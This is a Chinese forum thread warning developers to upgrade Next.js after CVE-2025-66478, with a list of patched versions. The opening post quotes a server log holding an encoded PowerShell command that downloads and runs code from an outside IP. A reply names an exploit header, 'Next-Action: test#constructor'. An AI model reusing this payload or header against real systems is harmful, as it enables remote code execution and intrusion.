Yoo趣儿

Yoo趣儿 Geek 程序员 🚨 Nextjs 大漏洞, 大家尽快去修复

🚨 Nextjs 大漏洞, 大家尽快去修复

查看 22|回复 2
作者:simonguo   
今天我们一个服务的受到攻击, 还好容器化+预警,没造成什么大的后果.
大家尽快去看一下自己 nextjs 版本是否有问题, 尽量升级修复
https://nextjs.org/blog/CVE-2025-66478
该漏洞已在以下已修复的 Next.js 版本中完全解决:
15.0.5
15.1.9
15.2.6
15.3.6
15.4.8
15.5.7
15.6.0-canary.58
16.0.7
2025-12-05T14:26:57.261834840+08:00 /bin/sh: 1: powershell: not found
2025-12-05T14:26:57.281016164+08:00  ⨯ [Error: Command failed: powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA
2025-12-05T14:26:57.281027836+08:00 /bin/sh: 1: powershell: not found
2025-12-05T14:26:57.281030581+08:00 ] {
2025-12-05T14:26:57.281033386+08:00   status: 127,
2025-12-05T14:26:57.281035610+08:00   signal: null,
2025-12-05T14:26:57.281038285+08:00   output: [Array],
2025-12-05T14:26:57.281040579+08:00   pid: 54,
2025-12-05T14:26:57.281042744+08:00   stdout: [B],
2025-12-05T14:26:57.281045459+08:00   stderr: [B],
2025-12-05T14:26:57.281047643+08:00   digest: '1126005934'
2025-12-05T14:26:57.281049837+08:00 }

nextjs, 漏洞, 修复

相关帖子

bearbest   
dify 也使用了 nextjs 今天刚更新了漏洞修复版本
shiny   
昨天已经受到攻击了,看到两种攻击类型,一种在 header 里添加 Next-Action: test#constructor 就会去初始化 Test
一种是执行 post 构建过来的 payload
返回列表
您需要登录后才可以回帖 登录 | 立即注册

AD1

热门主题

热门板块

问与答分享发现分享创造奇思妙想分享邀请码商业推广优惠信息PythonPHPJavaJavaScriptNode.jsGo语言C++HTML

公告

标签|小黑屋|Yoo趣儿

GMT+8, 2025-12-5 19:33 , Processed in 0.007804 second(s), 9 queries , Gzip On, MemCached On.

Powered by Discuz! X3.2

The happiest thing in the world is to strive for an ideal.

返回顶部